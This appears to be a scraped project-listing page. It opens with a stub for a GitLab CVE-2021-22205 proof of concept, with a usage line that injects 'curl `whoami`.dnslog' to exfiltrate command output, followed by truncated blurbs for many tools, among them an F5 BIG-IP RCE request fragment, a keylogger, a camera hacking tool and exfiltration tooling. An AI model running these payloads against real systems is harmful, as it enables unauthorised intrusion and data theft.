影响版本:
Usage
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"
获取csrf-token:
通过 /users/sign_in 获取csrf-token 然后使用前面的 CVE-2021-22205 poc 进行构造上传包进行执行未经身份验证的上传请求,最终rce
ref:
Braised-vegetables 将hw时信息收集以及简单的漏洞扫描操作步骤简单化 使用subfinder(被动子域名爆破收集) subdomain(主动域名爆破) nabbu(端口扫描) httpx(探测目录浏览) crawlergo(360深度爬虫) chorme(谷歌浏览器) xray(漏
CloakifyFactory CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight; Evade DLP/MLS Devices; Social Engineering of
This tool gives developers, researchers and companies the ability to analyze software packages of different programming languages that are being or will be used in their codes, providing information
CAM-HACK CC CAMERA HACKING TOOL Installation On Termux $ apt update
Generate your own NFTs and their metadata based on your desired probabilities. Use your own art assets too! Perfect for use with Candy Machine.
Installation $ pkg update && pkg upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Mark-Zuck/zafi $ cd zafi $ pip2 instal
CVE-2022-1388 CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE. POST /mgmt/tm/util/bash HTTP/1.1 Host: Accept-Encoding: gzip, deflate Accept: */
log4j-scan A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts Features Support for lists of URLs. Fuzzing for more
CVE-2022-21907 Description POC for CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability. create by antx at 2022-01-17, just some sm
GRR Rapid Response is an incident response framework focused on remote live forensics. Build Type Status Tests End-to-end Tests Windows Templates Linu
Just-Your-Basic-Port-Scanner Just your basic port scanner - with multiprocessing capabilities & further nmap enumeration. Use at your own discretion,
Safe Policy Optimization with Local Feature (SPO-LF) This is the source-code for implementing the algorithms in the paper "Safe Policy Optimization wi
Vacuum-Cleaner Python3 This is a Python3 agent that implements a simulator for a vacuum cleaner and it is introduction to Artificial Intelligence. A s
A tool that detects the "expensive" Carbon Black watchlists.
yLog4j This is Y-Sec's @PortSwigger Burp Plugin for the Log4j CVE-2021-44228 vulnerability. The focus of yLog4j is to support mass-scanning of the Log
KeyLogger-WebService "KeyLogger-WebService" Is a Keylogger Write In python. When you Inject the file on a computer once the file is opened on the comp
HatSploit collection of generic payloads designed to provide a wide range of attacks without having to spend time writing new ones.
All in One CRACKER911181's Tool. This Tool For Hacking and Pentesting. 🎭
The Linux tool to automate the process of getting a pty once you got admin credentials in a Wordpress site. Keep in mind that right now Omega only can attack Linux hosts.
ParamsExtractor A burp-suite plugin that extract all parameters name from in-scope requests. You can run the plugin while you are working on the targe
19 Nov 15, 2022
3 Oct 18, 2022
66 Nov 08, 2022
10 Sep 25, 2022
7 Sep 16, 2022
50 Dec 26, 2022
81 Dec 12, 2022
4 Aug 08, 2022
16 Dec 18, 2022
4.3k Jan 05, 2023
0 Nov 06, 2021
6 Jun 05, 2022
6 Nov 14, 2022
8 Aug 04, 2022
1 Jan 31, 2022
21 Dec 16, 2022
5 May 10, 2022
331 Jan 01, 2023
12 Nov 09, 2022
29 Nov 09, 2022